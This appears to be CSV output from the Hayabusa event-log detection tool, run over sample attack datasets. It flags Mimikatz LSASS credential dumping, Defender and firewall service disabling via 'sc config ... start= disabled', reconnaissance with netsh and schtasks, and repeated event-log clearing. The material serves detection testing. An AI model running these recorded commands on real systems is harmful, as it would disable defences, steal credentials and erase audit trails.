+2021-10-22 01:27:14.015 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" popup ""Malicious Behavior Detection Alert"" ""Elastic Security detected Execution via Renamed Signed Binary Proxy"" ""C:\Program Files\Elastic\Endpoint\cache\resources\elastic-endpoint-security.png"" | Process: C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" run | LID: 0x779c2 | PID: 26868 | PGUID: 00247C92-94E0-6171-0000-00104337987B",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 02:38:36.711 +09:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx
+2021-10-22 02:38:36.742 +09:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx
+2021-10-22 02:53:42.530 +09:00,FS03.offsec.lan,59,info,Evas | Persis,Bits Job Created,Job Title: BITS Transfer | URL: https://releases.ubuntu.com/20.04.3/ubuntu-20.04.3-desktop-amd64.iso,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID60-High volume file downloaded with BITS.evtx
+2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: mimikatz.exe | Process: C:\TOOLS\Mimikatzx64\mimikatz.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1f4c65f | PID: 2032 | PGUID: 7CF65FC7-D02C-6171-1203-000000001200 | Hash: SHA1=D241DF7B9D2EC0B8194751CD5CE153E27CC40FA4,MD5=A3CB3B02A683275F7E0A0F8A9A5C9E07,SHA256=31EB1DE7E840A342FD468E558E5AB627BCB4C542A8FE01AEC4D5BA01D539A0FC,IMPHASH=DBDEA7B557F0E6B5D9E18ABE9CE5220A",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx
+2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx
+2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: mimikatz.exe | LID: 0x2e6dea4 | PID: 5040 | PGUID: 7CF65FC7-D04B-6171-1303-000000001200 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx
+2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx
+2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,low,,Process Access,Src Process: C:\TOOLS\Mimikatzx64\mimikatz.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 2032 | Src PGUID: 7CF65FC7-D02C-6171-1203-000000001200 | Tgt PID: 512 | Tgt PGUID: 7CF65FC7-6649-6165-0B00-000000001200,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx
+2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx
+2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx
+2021-10-22 22:39:49.619 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx
+2021-10-22 22:39:50.927 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh advfirewall show allprofiles | Path: C:\Windows\System32\netsh.exe | PID: 0x1328 | User: admmig | LID: 0x1f4c65f,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx
+2021-10-22 22:39:55.502 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh a show allprofiles | Path: C:\Windows\System32\netsh.exe | PID: 0x10c4 | User: admmig | LID: 0x1f4c65f,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx
+2021-10-22 23:02:11.218 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx
+2021-10-22 23:02:11.902 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: schtasks /query /xml | Path: C:\Windows\System32\schtasks.exe | PID: 0xce0 | User: admmig | LID: 0x1f4c65f,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx
+2021-10-22 23:02:15.177 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3198a75,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx
+2021-10-24 06:50:11.666 +09:00,FS03.offsec.lan,4625,low,,Logon Failure - Unknown Reason,User: - | Type: 10 | Computer: - | IP Addr: 10.23.23.9 | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-failed login with denied access due to account restriction.evtx
+2021-10-24 06:51:57.212 +09:00,FS03.offsec.lan,4625,low,,Logon Failure - Unknown Reason,User: - | Type: 10 | Computer: - | IP Addr: 10.23.23.9 | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-failed login with denied access due to account restriction.evtx
+2021-10-25 16:23:05.614 +09:00,FS03.offsec.lan,4104,medium,Exfil,Powershell Exfiltration Over SMTP,,rules/sigma/powershell/powershell_script/posh_ps_send_mailmessage.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.614 +09:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:57:04.361 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config sense start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0xe58 | User: admmig | LID: 0x1844fa6,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx
+2021-10-25 16:57:05.977 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config mpssvc start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0x2ebc | User: admmig | LID: 0x1844fa6,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx
+2021-10-25 16:57:08.463 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc config WinDefend start= disabled | Path: C:\Windows\System32\sc.exe | PID: 0x2e40 | User: admmig | LID: 0x1844fa6,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender service deactivation attempt.evtx
+2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:09:51.875 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.002 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.080 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.095 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.127 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.142 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.215 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.293 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.340 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.355 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.418 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.480 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.527 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.574 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.591 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.606 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.638 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.653 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.669 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.747 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.778 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.794 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.841 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.856 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.888 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.903 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.950 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.997 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.028 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.044 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.059 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.075 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.106 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.138 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.184 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.200 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.216 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.231 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.263 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.294 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.309 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.325 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.341 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.356 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.403 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.419 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
